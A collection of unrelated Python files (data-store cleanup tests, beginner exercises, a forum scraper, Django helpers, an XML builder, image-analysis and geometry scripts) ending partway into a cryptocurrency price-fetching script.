enrich_keys = {k for k in store.keys() if "cube++enrich" in k}
for k in seed_keys:
store.delete(k)
driver(cube=cube, store=function_store)
assert enrich_keys == set(store.keys())
def test_missing_cube_files(driver, function_store):
df_seed = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
)
df_enrich = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
)
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
)
store = function_store()
enrich_keys = {k for k in store.keys() if "cube++enrich" in k and "/" in k}
for k in enrich_keys:
store.delete(k)
driver(cube=cube, store=function_store)
assert "cube++enrich.by-dataset-metadata.json" not in store.keys()
def test_missing_metadata(driver, function_store):
df_seed = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
)
df_enrich = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
)
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
)
store = function_store()
enrich_keys = {k for k in store.keys() if "cube++enrich" in k}
store.delete("cube++enrich.by-dataset-metadata.json")
driver(cube=cube, store=function_store)
assert not enrich_keys.intersection(store.keys())
def test_noop(driver, function_store):
df_seed = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
)
df_enrich = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
)
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
)
keys = set(function_store().keys())
driver(cube=cube, store=function_store)
assert set(function_store().keys()) == keys
def test_overwrite_check_with_copy(driver, function_store, function_store2):
df_seed = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
)
df_enrich = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
)
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
# build twice
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
)
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
overwrite=True,
)
# copy to another store to detect keys
copy_cube(cube=cube, src_store=function_store, tgt_store=function_store2)
keys = set(function_store2().keys())
assert set(function_store().keys()) != keys
driver(cube=cube, store=function_store)
assert set(function_store().keys()) == keys
def test_additional_files(driver, function_store):
df_seed = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
)
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
build_cube(data=df_seed, cube=cube, store=function_store)
key_in_ds = cube.ktk_dataset_uuid(cube.seed_dataset) + "/foo"
key_with_ds_prefix = cube.ktk_dataset_uuid(cube.seed_dataset) + ".foo"
key_with_cube_prefix = cube.uuid_prefix + ".foo"
key_with_cube_prefix_separator = cube.uuid_prefix + KTK_CUBE_UUID_SEPERATOR + ".foo"
function_store().put(key_in_ds, b"")
function_store().put(key_with_ds_prefix, b"")
function_store().put(key_with_cube_prefix, b"")
function_store().put(key_with_cube_prefix_separator, b"")
driver(cube=cube, store=function_store)
assert key_in_ds not in set(function_store().keys())
assert key_with_ds_prefix not in set(function_store().keys())
assert key_with_cube_prefix in set(function_store().keys())
assert key_with_cube_prefix_separator not in set(function_store().keys())
def test_fails_no_store_factory(driver, function_store, skip_eager):
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
store = function_store()
with pytest.raises(TypeError) as exc:
driver(cube=cube, store=store, no_run=True)
assert str(exc.value) == "store must be a factory but is HFilesystemStore"
def test_fail_blocksize_wrong_type(driver, function_store, skip_eager):
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
with pytest.raises(TypeError, match="blocksize must be an integer but is str"):
driver(cube=cube, store=function_store, blocksize="foo")
def test_fail_blocksize_negative(driver, function_store, skip_eager):
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
with pytest.raises(ValueError, match="blocksize must be > 0 but is -1"):
driver(cube=cube, store=function_store, blocksize=-1)
def test_fail_blocksize_zero(driver, function_store, skip_eager):
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
with pytest.raises(ValueError, match="blocksize must be > 0 but is 0"):
driver(cube=cube, store=function_store, blocksize=0)
|
def print19(start,end):
for i in range(start, end+1):
print(i,end=" ")
print("")
s=int(input("시작:"))
e=int(input("끝:"))
if s<e:
print19(s,e)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import urllib.request
import bs4
import re
from sqlConnector import mySql_Connector as sql
class webPageSpider:
# 初始化函数
def __init__(self):
pass
# 字符串过滤函数
def checkStr(self, String):
try:
# python UCS-4 build的处理方式
highpoints = re.compile(u'[\U00010000-\U0010ffff]')
except re.error:
# python UCS-2 build的处理方式
highpoints = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
resovle_value = highpoints.sub(u'', String)
return resovle_value
# 下载贴吧网页
def urlOpen(self, url):
req = urllib.request.Request(url)
response = urllib.request.urlopen(req)
html = response.read().decode('utf-8', 'ignore')
bsHtml = bs4.BeautifulSoup(html, 'html5lib')
return bsHtml
# 验证urlopen函数
def checkedUrlOpen(self, url):
bsHtml = self.urlOpen(url)
if bsHtml == 404:
return 404
elif bsHtml.find('body', {'class': 'page404'}):
return 404
else:
return bsHtml
# 楼主的一切所需要的信息爬取
def webPageUpInformation(self, bsHtml, url):
# 贴子标题
web_titleName = bsHtml.find('h1', {'class': {'core_title_txt ', 'core_title_txt member_thread_title_pb '}})
titleName = self.checkStr(web_titleName.get_text(strip=True))
# 发帖人
web_upName = bsHtml.find('a',
{'class': {'p_author_name j_user_card', 'p_author_name sign_highlight j_user_card'}})
upName = self.checkStr(web_upName.get_text(strip=True))
# 贴子正文
web_upEssay = bsHtml.find('div', {'class': 'd_post_content j_d_post_content clearfix'})
upEssay = self.checkStr(web_upEssay.get_text(strip=True))
# 发帖时间
web_essayTime = bsHtml.find('div', {'class': 'l_post j_l_post l_post_bright noborder '})
web_essayTimeJson = json.loads(web_essayTime['data-field'])
essayTime = web_essayTimeJson.get('content').get('date')
# 回复数量
web_commentsNum = bsHtml.find('li', {'class': 'l_reply_num'}).find('span', {'style': 'margin-right:3px'})
commentsNum = int(web_commentsNum.get_text(strip=True))
# 打印标题
print(titleName)
# 存入数据库
sql.insertPageValues(url, titleName, upName, upEssay, essayTime, commentsNum)
# 所有评论的爬取(可判断翻页)
def webPageCommentsInformation_crossPage(self, bsHtml, url):
commentsList = set()
web_pageNum = bsHtml.find('li', {'class': 'l_reply_num'}).findAll('span', {'class': 'red'})
pageNum = int(web_pageNum[1].get_text(strip=True))
# 打印页数
print('总共有' + str(pageNum) + '页')
for i in range(pageNum + 1):
if (i > 0 and pageNum < 10):
pageUrl = url + '?pn=' + str(i)
bsHtml2 = self.urlOpen(pageUrl)
if i == 1:
count = 0
web_comments = bsHtml2.findAll('div', {'class': 'd_post_content j_d_post_content clearfix'})
for comments in web_comments:
if count >= 1:
if len(self.checkStr(comments.get_text(strip=True))) != 0:
commentsList.add(self.checkStr(comments.get_text(strip=True)))
count = count + 1
else:
web_comments = bsHtml2.findAll('div', {'class': 'd_post_content j_d_post_content clearfix'})
for comments in web_comments:
if len(self.checkStr(comments.get_text(strip=True))) != 0:
commentsList.add(self.checkStr(comments.get_text(strip=True)))
elif (i > 0 and pageNum > 20):
print('评论页数大于10,只选择最后10页作为信息参考')
for i in range(pageNum + 1):
if i > (pageNum - 10):
pageUrl = url + '?pn=' + str(i)
bsHtml2 = self.urlOpen(pageUrl)
web_comments = bsHtml2.findAll('div', {'class': 'd_post_content j_d_post_content clearfix'})
for comments in web_comments:
if len(self.checkStr(comments.get_text(strip=True))) != 0:
commentsList.add(self.checkStr(comments.get_text(strip=True)))
# 存储进入数据库:
for i in commentsList:
sql.insertCommentsValues(url, i)
# 主函数
def main(self):
# 计数器
count = 1
sqlUrlList = sql.selectIndexCheckedValues()
if len(sqlUrlList) == 0:
print('没有网页未爬取的网页在数据库中,终止爬取')
else:
for i in sqlUrlList:
print('第', count, '个网页正在爬取存储中')
print(i)
bsHtml = self.checkedUrlOpen(i)
if bsHtml == 404:
sql.deleteIndexUrl(i)
print('此网页被删除或无法访问,跳过此网页')
continue
else:
self.webPageUpInformation(bsHtml, i)
self.webPageCommentsInformation_crossPage(bsHtml, i)
sql.updateIndexValues(i)
count = count + 1
print("这一轮爬取完毕")
if __name__ == '__main__':
page = webPageSpider()
page.main()
|
# 다트 게임은 총 3번의 기회로 구성된다.
# 각 기회마다 얻을 수 있는 점수는 0점에서 10점까지이다.
# 점수와 함께 Single(S), Double(D), Triple(T) 영역이 존재하고 각 영역 당첨 시 점수에서 1제곱, 2제곱, 3제곱 (점수1 , 점수2 , 점수3 )으로 계산된다.
# 옵션으로 스타상(*) , 아차상(#)이 존재하며 스타상(*) 당첨 시 해당 점수와 바로 전에 얻은 점수를 각 2배로 만든다.
# 아차상(#) 당첨 시 해당 점수는 마이너스된다.
# 스타상(*)은 첫 번째 기회에서도 나올 수 있다. 이 경우 첫 번째 스타상(*)의 점수만 2배가 된다. (예제 4번 참고)
# 스타상(*)의 효과는 다른 스타상(*)의 효과와 중첩될 수 있다. 이 경우 중첩된 스타상(*) 점수는 4배가 된다. (예제 4번 참고)
# 스타상(*)의 효과는 아차상(#)의 효과와 중첩될 수 있다. 이 경우 중첩된 아차상(#)의 점수는 -2배가 된다. (예제 5번 참고)
# Single(S), Double(D), Triple(T)은 점수마다 하나씩 존재한다.
# 스타상(*), 아차상(#)은 점수마다 둘 중 하나만 존재할 수 있으며, 존재하지 않을 수도 있다.
# 0~10의 정수와 문자 S, D, T, *, #로 구성된 문자열이 입력될 시 총점수를 반환하는 함수를 작성하라.
# 입력 형식
# "점수|보너스|[옵션]"으로 이루어진 문자열 3세트.
# 예) 1S2D*3T
# 점수는 0에서 10 사이의 정수이다.
# 보너스는 S, D, T 중 하나이다.
# 옵선은 *이나 # 중 하나이며, 없을 수도 있다.
# 출력 형식
# 3번의 기회에서 얻은 점수 합계에 해당하는 정수값을 출력한다.
# 예) 37
# 입출력 예제
# 예제 dartResult answer 설명
# 1 1S2D*3T 37 1^1 * 2 + 2^2 * 2 + 3^3
# 2 1D2S#10S 9 1^2 + 2^1 * (-1) + 10^1
# 3 1D2S0T 3 1^2 + 2^1 + 0^3
# 4 1S*2T*3S 2^3 1^1 * 2 * 2 + 2^3 * 2 + 3^1
# 5 1D#2S*3S 5 1^2 * (-1) * 2 + 2^1 * 2 + 3^1
# 6 1T2D3D# -4 1^3 + 2^2 + 3^2 * (-1)
# 7 1D2S3T* 5^9 1^2 + 2^1 * 2 + 3^3 * 2
import re
dartResult = '1S2D*3T'
def solution(dartResult):
bonus = {'S' : 1, 'D' : 2, 'T' : 3}
option = {'' : 1, '*' : 2, '#' : -1}
p = re.compile('(\d+)([SDT])([*#]?)')
dart = p.findall(dartResult)
print(dart) # [('1', 'S', ''), ('2', 'D', '*'), ('3', 'T', '')]
print(len(dart)) # 3
for i in range(len(dart)): # 정규표현식으로 갈무리된 문자열들
if dart[i][2] == '*' and i > 0: # i[1][2] = *
dart[i-1] *= 2 # 1*2
print(dart[i-1]) #2
dart[i] = int(dart[i][0]) ** bonus[dart[i][1]] * option[dart[i][2]]
answer = sum(dart)
return answer
print(solution(dartResult)) # 37
# (\d+) : 정수 (10이상도 찾아줌) +는 1개이상
# ([SDT]) : 'SDT' 인 문자 S or D or T
# ([*#]?) : '*#' 문자를 찾는데, ? -> 없을 수도 있음(0개일수도있음) |
import re
pat = r'^\d+$'
x = input()
if bool(re.match(pat, n)):
x = int(x)
flag = True
ar = list(input().split())
for i in ar:
if not bool(re.match(pat, i)):
print("Invalid")
flag = False
break
if flag:
ans = []
for i in range(n):
if i == int(ar[i]):
ans.append(i)
if len(ans) == 0:
print(-1)
else:
print(*ans)
else:
print("Invalid")
|
from django.contrib import admin
from accounts.models import Contact_Information, Days
class ContactInline(admin.TabularInline):
model = Days
extra = 3
class ContactAdmin(admin.ModelAdmin):
list_display = ('phone', 'office', 'email', 'github', 'bitbucket')
inlines = (ContactInline,)
admin.site.register(Contact_Information, ContactAdmin)
|
import functools
import utils.minidom_fix as dom
class XML_builder:
def __init__(self, schema):
self.schema = schema
def ram_to_xml(self):
if self.schema is None:
raise ValueError("Schema is empty")
xml = dom.Document()
element = xml.createElement("dbd_schema")
node = element
if self.schema.fulltext_engine is not None:
node.setAttribute("fulltext_engine", self.schema.fulltext_engine)
if self.schema.version is not None:
node.setAttribute("version", self.schema.version)
if self.schema.name is not None:
node.setAttribute("name", self.schema.name)
if self.schema.description is not None:
node.setAttribute("description", self.schema.description)
node.appendChild(xml.createElement("custom"))
domains = xml.createElement("domains")
createDomain = functools.partial(self._createDomainNode, xml)
for domain in map(createDomain, self.schema.domains):
domains.appendChild(domain)
node.appendChild(domains)
tables = xml.createElement("tables")
createTable = functools.partial(self._createTableNode, xml)
for table in map(createTable, self.schema.tables):
tables.appendChild(table)
node.appendChild(tables)
xml.appendChild(node)
return xml
def _createDomainNode(self, xml, domain, node=None):
if node is None:
node = xml.createElement("domain")
if domain.name is not None:
node.setAttribute("name", domain.name)
if domain.description is not None:
node.setAttribute("description", domain.description)
if domain.type is not None:
node.setAttribute("type", domain.type)
if domain.data_type_id is not None:
node.setAttribute("type", domain.type)
if domain.align is not None:
node.setAttribute("align", domain.align)
if domain.width is not None:
node.setAttribute("width", domain.width)
if domain.precision is not None:
node.setAttribute("precision", domain.precision)
props = []
if domain.show_null:
props.append("show_null")
if domain.summable:
props.append("summable")
if domain.case_sensitive:
props.append("case_sensitive")
if domain.show_lead_nulls:
props.append("show_lead_nulls")
if domain.thousands_separator:
props.append("thousands_separator")
if props:
node.setAttribute("props", ", ".join(props))
if domain.char_length is not None:
node.setAttribute("char_length", domain.char_length)
if domain.length is not None:
node.setAttribute("length", domain.length)
if domain.scale is not None:
node.setAttribute("scale", domain.scale)
return node
def _createTableNode(self, xml, table, node=None):
if node is None:
node = xml.createElement("table")
if table.name is not None:
node.setAttribute("name", table.name)
if table.description is not None:
node.setAttribute("description", table.description)
props = []
if table.add:
props.append("add")
if table.edit:
props.append("edit")
if table.delete:
props.append("delete")
if props:
node.setAttribute("props", ", ".join(props))
if table.ht_table_flags is not None:
node.setAttribute("ht_table_flags", table.ht_table_flags)
if table.access_level is not None:
node.setAttribute("access_level", table.access_level)
createField = functools.partial(self._createFieldNode, xml)
for field in map(createField, table.fields):
node.appendChild(field)
createConstraint = functools.partial(self._createConstraintNode, xml)
for constraint in map(createConstraint, table.constraints):
node.appendChild(constraint)
createIndex = functools.partial(self._createIndexNode, xml)
for index in map(createIndex, table.indices):
node.appendChild(index)
return node
def _createFieldNode(self, xml, field, node=None):
if node is None:
node = xml.createElement("field")
if field.name is not None:
node.setAttribute("name", field.name)
if field.rname is not None:
node.setAttribute("rname", field.rname)
if field.domain is not None:
if field.domain is not None:
if str(field.domain) is not None:
node.setAttribute("domain", field.domain)
else:
if field.domain.name:
node.setAttribute("domain", field.domain.name)
else:
node.setAttribute("domain.char_length", field.domain.char_length)
node.setAttribute("domain.precision", field.domain.precision)
node.setAttribute("domain.scale", field.domain.scale)
node.setAttribute("domain.type", field.domain.type)
if field.description is not None:
node.setAttribute("description", field.description)
props = []
if field.input:
props.append("input")
if field.edit:
props.append("edit")
if field.show_in_grid:
props.append("show_in_grid")
if field.show_in_details:
props.append("show_in_details")
if field.is_mean:
props.append("is_mean")
if field.autocalculated:
props.append("autocalculated")
if field.required:
props.append("required")
if props:
node.setAttribute("props", ", ".join(props))
return node
def _createConstraintNode(self, xml, constraint):
node = xml.createElement("constraint")
if constraint.name is not None:
node.setAttribute("name", constraint.name)
if constraint.kind is not None:
node.setAttribute("kind", constraint.kind)
if constraint.items is not None:
if len(constraint.items) == 1:
node.setAttribute("items", constraint.items[0])
else:
pass
if constraint.reference_type is not None:
node.setAttribute("reference_type", constraint.reference_type)
if constraint.reference is not None:
node.setAttribute("reference", constraint.reference)
if constraint.expression is not None:
node.setAttribute("", constraint.expression)
props = []
if constraint.has_value_edit:
props.append("has_value_edit")
if constraint.cascading_delete:
props.append("cascading_delete")
if constraint.full_cascading_delete:
props.append("full_cascading_delete")
if props:
node.setAttribute("props", ", ".join(props))
return node
def _createIndexNode(self, xml, index):
if index.fields:
node = xml.createElement("index")
if len(index.fields) == 1:
node.setAttribute("field", index.fields[0])
else:
createItem = functools(self._createItem, xml)
for item in map(createItem, index.fields):
node.appendChild(item)
if index.name is not None:
node.setAttribute("name", index.name)
props = [];
if index.fulltext:
props.append("fulltext")
if index.uniqueness:
props.append("uniqueness")
if index.is_clustered:
props.append("clustered")
if props:
node.setAttribute("props", ", ".join(props))
return node
else:
raise ValueError("Index has no fields")
def _createItem(self, xml, item):
node = xml.createElement("item")
node.setAttribute("name", item.name)
node.setAttribute("position", str(item.position.encode('utf-8')))
if item.desc:
node.setAttribute("desc")
return node |
n1 = int(input())
n2 = int(input())
n3 = int(input())
if (n1+n2 == n3) or (n1+n3 == n2) or (n2+n3 == n1):
print ('soma')
else:
if (n1*n2 == n3) or (n1*n3 == n2) or (n2*n3 == n1):
print ('multi')
else:
if ((n1+n2+n3)%2 == 0):
print ('par')
else:
print ('ímpar') |
import subprocess
import threading
import time
class ShellRunnerTimeout(Exception):
def __init__(self, cmd):
self.cmd = ' '.join(cmd)
class ShellRunnerFailed(Exception):
def __init__(self, cmd, retval):
self.cmd = ' '.join(cmd)
self.retval = retval
class ShellRunner(object):
def __init__(self, cmd, logfile):
self.cmd = cmd
self.logfile = logfile
self.process = None
def run(self, timeout):
def target():
self.process = subprocess.Popen(self.cmd, stdout=self.logfile, stderr=subprocess.STDOUT, close_fds=True)
self.process.wait()
start_time = time.time()
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
raise ShellRunnerTimeout(self.cmd)
# TODO: Get the return code and raise if != 0
# Return the remaining time
return timeout - (time.time() - start_time)
|
from django import template
from django.core.urlresolvers import reverse
from ..models import Appointment
register = template.Library()
class ContinuationAppointmentAnchor(template.Node):
"""return a reverse url for a continjuation appointment if the appointment does not already exist"""
def __init__(self, appointment, dashboard_type, extra_url_context):
self.unresolved_appointment = template.Variable(appointment)
self.unresolved_dashboard_type = template.Variable(dashboard_type)
self.unresolved_extra_url_context = template.Variable(extra_url_context)
def render(self, context):
self.appointment = self.unresolved_appointment.resolve(context)
self.dashboard_type = self.unresolved_dashboard_type.resolve(context)
self.registered_subject = self.appointment.registered_subject
self.extra_url_context = self.unresolved_extra_url_context
if not self.extra_url_context:
self.extra_url_context = ''
# does a continuation appointment exist? instance will be instance+1
if (int(self.appointment.visit_instance) + 1) in [int(appointment.visit_instance) for appointment in Appointment.objects.filter(registered_subject=self.appointment.registered_subject)]:
anchor = ''
else:
view = 'admin:%s_%s_add' % (self.appointment._meta.app_label, self.appointment._meta.module_name)
try:
# TODO: resolve error when using extra_url_context...give back variable name ???
# rev_url = '%s?next=dashboard_url&dashboard_type=%s®istered_subject=%s&visit_definition=%s&visit_instance=%s%s' % (reverse(view), self.dashboard_type, self.appointment.registered_subject.pk,self.appointment.visit_definition.pk, str(int(self.appointment.visit_instance) + 1), self.extra_url_context)
rev_url = '%s?next=dashboard_url&dashboard_type=%s®istered_subject=%s&visit_definition=%s&visit_instance=%s' % (reverse(view), self.dashboard_type, self.appointment.registered_subject.pk, self.appointment.visit_definition.pk, str(int(self.appointment.visit_instance) + 1))
anchor = '<A href="%s">continuation</A>' % (rev_url)
except:
raise TypeError('ContinuationAppointmentUrl Tag: NoReverseMatch while rendering reverse for %s. Is model registered in admin?' % (self.appointment._meta.module_name))
return anchor
@register.tag(name='continuation_appointment_anchor')
def continuation_appointment_anchor(parser, token):
"""Compilation function for renderer ContinuationAppointmentUrl"""
try:
tag_name, appointment, dashboard_type, extra_url_context = token.split_contents()
except ValueError:
raise template.TemplateSyntaxError("%r tag requires exactly 3 arguments" % token.contents.split()[0])
return ContinuationAppointmentAnchor(appointment, dashboard_type, extra_url_context)
@register.filter(name='appt_type')
def appt_type(value):
"""Filters appointment.appt_type."""
if value == 'clinic':
retval = 'Clin'
elif value == 'telephone':
retval = 'Tele'
elif value == 'home':
retval = 'Home'
else:
retval = None
return retval
|
import json
data = None
ROWLATITUDE = 7 # Column number that latitude value is located in
ROWLARVAE = 16
debug_bool = True
#
# Algorithm:
# TODO: Put in algorithm steps
# TODO: Create adjacency matrix for weightd edges on the graph
#
def debug(s):
if(debug_bool):
print(s)
class Animal:
def __init__(self, latitude, larvae_amount):
super().__init__()
self.latitude = latitude
self.name = larvae_amount
def data_partition_groups(fileName) -> dict:
''' Partition the data from a JSON file into animal groups based on location '''
file = open(fileName) # Open buffer
data = json.load(file)
species_location = [] # Temp list with all species in a location
animal_group = [] # Group animals by their location
latitude_temp = None
first = data['table']['rows'][0] # Temp set to first animal
animal_group.append(Animal(latitude=first[ROWLATITUDE], larvae_amount=first[ROWLARVAE]) )
temp = 0 # REMOVE: testing variable for now to only get 5 values
length = len(data['table']['rows'])
for i in range(1, length):
position = data['table']['rows'][i] # Add the animal at the current position
animal_temp = Animal(latitude=position[ROWLATITUDE], larvae_amount=position[ROWLARVAE])
debug(animal_temp.latitude)
if(animal_group[0].latitude != animal_temp.latitude): # Begin new animal group by location
correlate(animal_group) # Correlate the previous animal_group
animal_group.clear() # Clear the animal_group for species at new location
animal_group.append(animal_temp)
temp = temp + 1
if temp > 5:
break
file.close() # Close buffer
# TODO: Find out if this is necessary?
def init_hash_map(data):
''' Hash map for unique locations of species '''
def sort_func(arr):
return arr['latitude']
data.sort(key = sort_func)
# TODO: Implement C(n,2) correlations per array, update adjacency matrix
def correlate(list):
debug("Correlate called")
temp = None
def main():
data_partition_groups("2015_data.json")
# Call to main
main() |
#I got this code working shortly after starting the project
#So it was developed for visible light photos with no filter
#Then I started fooling around with double thresholding for the mask
#Bandpass filter will severely affect thresholding
#Background subtraction might have to be substituted instead
from plantcv import plantcv as pcv
import cv2
import numpy as np
#Define options for plantCV
class options:
def __init__(self):
self.image = "RGB3.jpg"
self.debug = "print" #plot
self.writeimg= False
self.result = "."
self.outdir = "/home/anorman/Documents/NikScripts/WorkingImages"
args = options()
pcv.params.debug = args.debug
#Reads in calibrated rgb and NIR images
rgb_img,rgb_path,rgb_filename = pcv.readimage(filename="RGB2.jpeg")
NIR_img, NIR_path, NIR_filename = pcv.readimage(filename="NIR2.jpeg")
#Converts and slices image into green-magenta channel and blue-yellow channel
green_magenta_img = pcv.rgb2gray_lab(rgb_img= rgb_img, channel='a')
blue_yellow_img = pcv.rgb2gray_lab(rgb_img= rgb_img,channel='l')
#Thresholds both sliced photos, creating two binary masks of plant material
img_binary1 = pcv.threshold.binary(gray_img=green_magenta_img, threshold=125, max_value=250, object_type='dark')
img_binary2 = pcv.threshold.binary(gray_img=blue_yellow_img, threshold=142, max_value=250, object_type='dark')
#and operator.Combines the two masks, keeping only the pieces contained in both
combined_thresh = pcv.logical_and(img_binary1, img_binary2)
#Fills small objects in mask
fill_image = pcv.fill(bin_img=combined_thresh, size=20)
#Dilates mask
dilated = pcv.dilate(gray_img=fill_image, ksize=2, i=1)
#Uses mask to identify objects
id_objects, obj_hierarchy = pcv.find_objects(img=rgb_img, mask=dilated)
id_objects, obj_hierarchy = pcv.find_objects(img=NIR_img, mask=dilated)
#Crops photos using the same mask
cropped_rgb = pcv.apply_mask(img=rgb_img, mask=dilated,mask_color='black')
cropped_NIR = pcv.apply_mask(img=NIR_img, mask=dilated, mask_color='black')
#Numpy slicing: Blue -[:,:,0] Green-[:,:,1]Red-[:,:,2] to create individual color channel photos
cropped_red_rgb = cropped_rgb[:,:,2]
cropped_red_NIR = cropped_NIR[:,:,2]
#Initializes NDVI value matrix
NDVI_data = []
#Goes through each pixel of rgb and NIR photos and does NDVI calculation for each
#Appends each pixel value in a single dimension matrix
for x in range(0,len(cropped_rgb)):
for y in range(0,len(cropped_rgb[0])):
p = float(cropped_red_NIR[x,y]) - float(cropped_red_rgb[x,y])
q = float(cropped_red_NIR[x,y]) + float(cropped_red_rgb[x,y])
#In case red and NIR are both 0 (0/0 division), sets ndvi value to -10
if p == 0 and q == 0:
NDVI_data.append(-10)
else:
NDVI_data.append(p/q)
#The ndvi matrix contains values ranging from -1 to 1 (plus safety values of -10)
#To create a greyscale photo out of this, we need to convert to a scale from 0-256
#Initialize ndvi average variables and greyscale photo matrix
k = 0
NDVI_sum = 0
grey_NDVI = []
#Sifts through NDVI data matrix, checking for -10 condition
#sums data values and counts pixels
#Converts into greyscale photo values and appends to matrix
for i in range(0,len(NDVI_data)):
if NDVI_data[i] != -10:
k += 1
NDVI_sum += NDVI_data[i]
grey_NDVI.append(((NDVI_data[i])+1)*127.5)
else:
grey_NDVI.append(0)
#Calculates average NDVI using NDVI sum and pixel count
NDVI_average = NDVI_sum/float(k)
print (NDVI_average)
#Reshapes greyscale NDVI photo into a real photo format
pseudocolor = np.reshape(grey_NDVI,(len(cropped_red_rgb),len(cropped_red_rgb[0])))
#Creates a pseudocolored photo of NDVI values
pcv.visualize.pseudocolor(pseudocolor, obj=None, mask=None, background="image", cmap='gist_rainbow', min_value=0, max_value=255,axes=True, colorbar=True, obj_padding=None)
|
import os
import sys
import json
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'langeval'))
from eval import LanguageEval
class LangEvaluator():
def __init__(self, dataset):
self.uid2ref = {}
self.langeval = LanguageEval()
for datum in dataset.data:
self.uid2ref[datum['uid']] = datum['sents']
def evaluate(self, uid2pred):
gts = []
preds = []
for uid, pred in uid2pred.items():
preds.append(pred)
gts.append(self.uid2ref[uid])
return self.langeval.eval_whole(gts, preds, no_metrics={})
def get_reward(self, uidXpred, metric="CIDEr"):
gts = []
preds = []
for uid, pred in uidXpred:
preds.append(pred)
gts.append(self.uid2ref[uid])
return self.langeval.eval_batch(gts, preds, metric)
|
import numpy as np
import os
def estimateProjectionMatrix(x, y, P, num) :
Q = np.array([])
for i in range(num) :
Pk = P[:, i]
zeroMat = np.zeros(4)
xk = x[i]
yk = y[i]
Qk = np.array([
np.hstack((Pk.T, zeroMat, (-xk) * (Pk.T))),
np.hstack((zeroMat, Pk.T, (-yk) * (Pk.T)))
])
if np.array_equal(Q, []) :
Q = Qk
else :
Q = np.vstack((Q, Qk))
U, E, V = np.linalg.svd(Q)
res = np.array([
[V[11, 0], V[11, 1], V[11, 2], V[11, 3]],
[V[11, 4], V[11, 5], V[11, 6], V[11, 7]],
[V[11, 8], V[11, 9], V[11, 10], V[11, 11]]
])
return res
if __name__ == "__main__" :
path = 'data/mydata/txt/datapoints/'
i = 0
for filename in os.listdir(path):
file = open(path + filename, 'r')
lines = file.readlines()
p_num = int(lines.pop(0))
x = []
y = []
p = np.array([])
for j in range(p_num) :
line = lines.pop(0)
words = line.split()
x.append(int(words[0]))
y.append(int(words[1]))
pt = np.array([float(words[2]) / 1000, float(words[3]) / 1000, float(words[4]) / 1000, float(words[5])])
if np.array_equal(p, []) :
p = pt
else :
p = np.vstack((p, pt))
p = p.T
file.close()
pmat = estimateProjectionMatrix(x, y, p, p_num)
pt = np.array([0, 0, 0, 1])
res = pmat @ pt
print(res)
res /= res[2]
print(res)
exit()
# file = open(f"data/mydata/txt/000000{i:02d}.txt", 'w+')
# file.write("CONTOUR\n")
# for y in range(pmat.shape[0]) :
# for x in range(pmat.shape[1]) :
# file.write(str(pmat[y][x])); file.write(" ")
# file.write("\n")
# i += 1 |
from django.utils.deprecation import MiddlewareMixin
class MyMiddleWare(MiddlewareMixin):
def process_request(self,request):
print(request.path)
|
import os
import sys
from xcoin_api_client import *
from binance.client import Client
import pprint
import json
import urllib.request
from urllib.request import Request, urlopen
import threading
import datetime
import time
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import uic
ret = 0;
bithumb_rgParams = {
"order_currency" : "ALL",
"payment_currency" : "KRW"
};
coin = ["ETH", "EOS", "ETC", "LTC", "DASH", "XRP", "XMR", "QTUM", "ZEC"];
coin_binance = ["ETHUSDT", "EOSETH", "ETCETH", "LTCETH", "DASHETH", "XRPETH", "XMRETH", "QTUMETH", "ZECETH"];
coin_map = {
"ETHUSDT" : "ETH",
"EOSETH" : "EOS",
"ETCETH" : "ETC",
"LTCETH" : "LTC",
"DASHETH" : "DASH",
"XRPETH" : "XRP",
"XMRETH" : "XMR",
"QTUMETH" : "QTUM",
"ZECETH" : "ZEC"
};
class Exchange:
infoA = {
'Exchange' : "----", # User Input Value
'Cur_Price' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Get Price valule from Server Api
